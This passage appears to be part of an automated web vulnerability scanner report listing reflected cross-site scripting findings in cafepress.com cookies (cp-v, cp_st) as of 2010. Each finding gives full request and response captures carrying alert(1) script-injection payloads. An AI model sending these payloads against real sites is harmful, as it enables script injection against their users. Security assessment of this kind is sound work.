__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA62888"-alert(1)-"6e0c4f15927; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 49072
Date: Sun, 26 Dec 2010 13:49:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 49072


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA62888"-alert(1)-"6e0c4f15927";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.79. http://www.cafepress.com/TheGamingApe [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /TheGamingApe

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c582f</script><script>alert(1)</script>2b819df52d1 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c582f</script><script>alert(1)</script>2b819df52d1; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 49112
Date: Sun, 26 Dec 2010 13:49:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 49112


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook
...[SNIP]...
s = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'PremiumShop'
window.cafepress.tealeaf.searchTerm = 'c582f</script><script>alert(1)</script>2b819df52d1'
window.cafepress.tealeaf.salesChannel = 'Shop'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.80. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/catalogExp/RedirectWithSEOURL.aspx

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10557"-alert(1)-"7c7111c0034 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA10557"-alert(1)-"7c7111c0034; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 75201
Date: Sun, 26 Dec 2010 13:46:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75201


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA10557"-alert(1)-"7c7111c0034";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.81. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/catalogExp/RedirectWithSEOURL.aspx

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97a3f</script><script>alert(1)</script>4b81aaff511 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=97a3f</script><script>alert(1)</script>4b81aaff511; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 75223
Date: Sun, 26 Dec 2010 13:46:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
n_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'HomePage'
window.cafepress.tealeaf.searchTerm = '97a3f</script><script>alert(1)</script>4b81aaff511'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.82. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/catalogExp/addtocarthelper.aspx

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 758b2"-alert(1)-"7bb18591cca was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA758b2"-alert(1)-"7bb18591cca; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
ntCoent-Length: 41323
Date: Sun, 26 Dec 2010 13:46:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 41323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA758b2"-alert(1)-"7bb18591cca";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.83. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/catalogExp/addtocarthelper.aspx

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a79f</script><script>alert(1)</script>f30bd18751f was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4a79f</script><script>alert(1)</script>f30bd18751f; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
ntCoent-Length: 41343
Date: Sun, 26 Dec 2010 13:46:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 41343


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
ryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/error404.aspx?404;http://www.cafepress.com:80/cp/addtocart.aspx'
window.cafepress.tealeaf.searchTerm = '4a79f</script><script>alert(1)</script>f30bd18751f'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.84. http://www.cafepress.com/cp/info/about/ [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/info/about/

Issue detail

